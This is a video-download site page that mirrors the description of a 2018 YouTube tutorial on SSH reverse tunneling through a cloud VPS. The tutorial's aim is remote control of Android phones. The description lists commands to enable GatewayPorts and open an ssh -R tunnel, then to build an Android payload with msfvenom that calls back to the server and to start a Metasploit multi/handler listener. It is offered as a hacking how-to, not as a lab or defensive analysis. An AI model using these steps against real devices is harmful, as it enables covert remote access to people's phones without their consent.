Logo video2dn
  • Сохранить видео с ютуба
  • Категории
    • Музыка
    • Кино и Анимация
    • Автомобили
    • Животные
    • Спорт
    • Путешествия
    • Игры
    • Люди и Блоги
    • Юмор
    • Развлечения
    • Новости и Политика
    • Howto и Стиль
    • Diy своими руками
    • Образование
    • Наука и Технологии
    • Некоммерческие Организации
  • О сайте

Скачать или смотреть port forward without router and mobile | with VPS and control android

  • Pranay Kalita
  • 2018-01-20
  • 966
port forward without router and mobile | with VPS and control android
hackingvpsgoogle cloudeparrotmetasploitpayloadtcp tunnelinghack android without port forwardhack androidhow to port forwardhacksshport forwardhow toport forward without routerssh tunnelingssh port forwardport forward with mobile hotspotforwardncs
  • ok logo

Скачать port forward without router and mobile | with VPS and control android бесплатно в качестве 4к (2к / 1080p)

У нас вы можете скачать бесплатно port forward without router and mobile | with VPS and control android или посмотреть видео с ютуба в максимальном доступном качестве.

Для скачивания выберите вариант из формы ниже:

  • Информация по загрузке:

Cкачать музыку port forward without router and mobile | with VPS and control android бесплатно в формате MP3:

Если иконки загрузки не отобразились, ПОЖАЛУЙСТА, НАЖМИТЕ ЗДЕСЬ или обновите страницу
Если у вас возникли трудности с загрузкой, пожалуйста, свяжитесь с нами по контактам, указанным в нижней части страницы.
Спасибо за использование сервиса video2dn.com

Описание к видео port forward without router and mobile | with VPS and control android

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

First of all I will explain SSH:

SSH is remote login shell that helps you to connect remote machines using encrypted connection. So once you made ssh connection to any remote host the connection between hosts are secure and encrypted.

SSH tunneling is routing your traffic through SSH secure connection.

In simple words SSH tunneling is nothing but one connection is encapsulated by another connection. By taking this as a advantage we make tunnels by using SSH client.

more: https://en.wikipedia.org/wiki/Tunneli...

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
time stamps----

00:00:10 --create server/vps in google cloude
(you can use any server.just need ssh )

00:00:35 -- add ssh key to connect with google cloude server

00:01:40 -- add port in firewall

00:02:10 -- setup sshd_config for port forwarding

00:03:15-- create android payload and test it


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

commands:---
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$ssh-keygen
login to server and add "GatewayPorts yes" at the bottom of the sshd config located in
/etc/ssh

$sudo nano /etc/ssh/sshd_config

restart ssh service

$service ssh restart

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

START THE SSH PORT FORWARDING(remote ssh tunnel)

$ssh -R port:127.0.0.1:port user@server_ip

u can also use -nNT to avoid opening shell

$ssh -nNT -R port:127.0.0.1:port user@server_ip
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

create payload with msfvenom

$msfvenom -p payload lhost=server_ip lport=port -o outputpath/example.extension

start listener

$msfconsole
|__
$use multi/handler
$set payload payload
$set lhost=127.0.0.1
$set lport=port
$exploit -j

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Track: "My Heart" by Different Heaven & Eh!de
Music provided by NoCopyrightSounds.
Watch:    • Different Heaven & EH!DE - My Heart | Drum...  

Комментарии

Информация по комментариям в разработке

Похожие видео

  • О нас
  • Контакты
  • Отказ от ответственности - Disclaimer
  • Условия использования сайта - TOS
  • Политика конфиденциальности

video2dn Copyright © 2023 - 2025

Контакты для правообладателей [email protected]